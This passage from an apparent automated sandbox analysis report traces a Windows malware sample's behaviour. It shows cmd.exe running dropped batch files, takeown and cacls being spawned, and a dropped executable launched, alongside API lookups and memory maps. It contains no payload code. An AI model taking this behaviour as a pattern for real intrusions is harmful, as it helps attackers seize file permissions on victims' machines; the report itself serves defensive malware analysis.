| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:07 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #165: cmd.exe
0
0
| Information | Value |
|---|---|
| ID | #165 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\zhUe98iP.bat" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:56, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:45 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x888 |
| Parent PID | 0x330 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x00000018f3570000 | 0x18f3570000 | 0x18f358ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000018f3570000 | 0x18f3570000 | 0x18f357ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000018f3590000 | 0x18f3590000 | 0x18f35a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000018f35b0000 | 0x18f35b0000 | 0x18f36affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000018f36b0000 | 0x18f36b0000 | 0x18f36b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000018f36c0000 | 0x18f36c0000 | 0x18f36c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000018f36d0000 | 0x18f36d0000 | 0x18f36d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x18f36e0000 | 0x18f379dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000018f38d0000 | 0x18f38d0000 | 0x18f39cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffac0000 | 0x7df5ffac0000 | 0x7ff5ffabffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff6c8520000 | 0x7ff6c8520000 | 0x7ff6c861ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6c8620000 | 0x7ff6c8620000 | 0x7ff6c8642fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6c864c000 | 0x7ff6c864c000 | 0x7ff6c864cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6c864e000 | 0x7ff6c864e000 | 0x7ff6c864ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x7ff6c9550000 | 0x7ff6c95a8fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #166: cmd.exe
331
0
| Information | Value |
|---|---|
| ID | #166 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:57, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x430 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E4C
0x
DB8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x04e2ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004e30000 | 0x04e30000 | 0x04e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e30000 | 0x04e30000 | 0x04e3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04e43fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e53fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e60000 | 0x04e60000 | 0x04e73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x04fbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004fc0000 | 0x04fc0000 | 0x04fc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004fd0000 | 0x04fd0000 | 0x04fd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004fe0000 | 0x04fe0000 | 0x04fe1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ff0000 | 0x050adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000050b0000 | 0x050b0000 | 0x050effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050f0000 | 0x050f0000 | 0x050fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005110000 | 0x05110000 | 0x0511ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0521ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005370000 | 0x05370000 | 0x054cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x054d0000 | 0x05806fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f590000 | 0x7f590000 | 0x7f68ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f690000 | 0x7f690000 | 0x7f6b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f6b6000 | 0x7f6b6000 | 0x7f6b8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6b9000 | 0x7f6b9000 | 0x7f6bbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6bc000 | 0x7f6bc000 | 0x7f6bcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6bf000 | 0x7f6bf000 | 0x7f6bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (253)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
128 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 86 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 65 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 200, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x93c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xe5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xc50, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (47)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
13 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Dotted_Line.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "Dotted_Line.jtp" |
|
1 |
Process #167: mpcmdrun.exe
0
0
| Information | Value |
|---|---|
| ID | #167 |
| File Name | c:\program files\windows defender\mpcmdrun.exe |
| Command Line | "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:01, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe9c |
| Parent PID | 0x338 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E70
0x
7B4
0x
374
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000089a2d0000 | 0x89a2d0000 | 0x89a2effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000089a2d0000 | 0x89a2d0000 | 0x89a2dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000089a2e0000 | 0x89a2e0000 | 0x89a2e6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000089a2f0000 | 0x89a2f0000 | 0x89a303fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000089a310000 | 0x89a310000 | 0x89a38ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000089a390000 | 0x89a390000 | 0x89a393fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000089a3a0000 | 0x89a3a0000 | 0x89a3a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000089a3b0000 | 0x89a3b0000 | 0x89a3b1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x89a3c0000 | 0x89a47dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000089a480000 | 0x89a480000 | 0x89a4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000089a500000 | 0x89a500000 | 0x89a506fff | Private Memory | rw |
|
|
|
- |
| private_0x000000089a510000 | 0x89a510000 | 0x89a510fff | Private Memory | rw |
|
|
|
- |
| private_0x000000089a520000 | 0x89a520000 | 0x89a520fff | Private Memory | rw |
|
|
|
- |
| msmplics.dll | 0x89a530000 | 0x89a531fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000089a570000 | 0x89a570000 | 0x89a66ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000089a670000 | 0x89a670000 | 0x89a73ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000089a670000 | 0x89a670000 | 0x89a72ffff | Pagefile Backed Memory | r |
|
|
|
- |
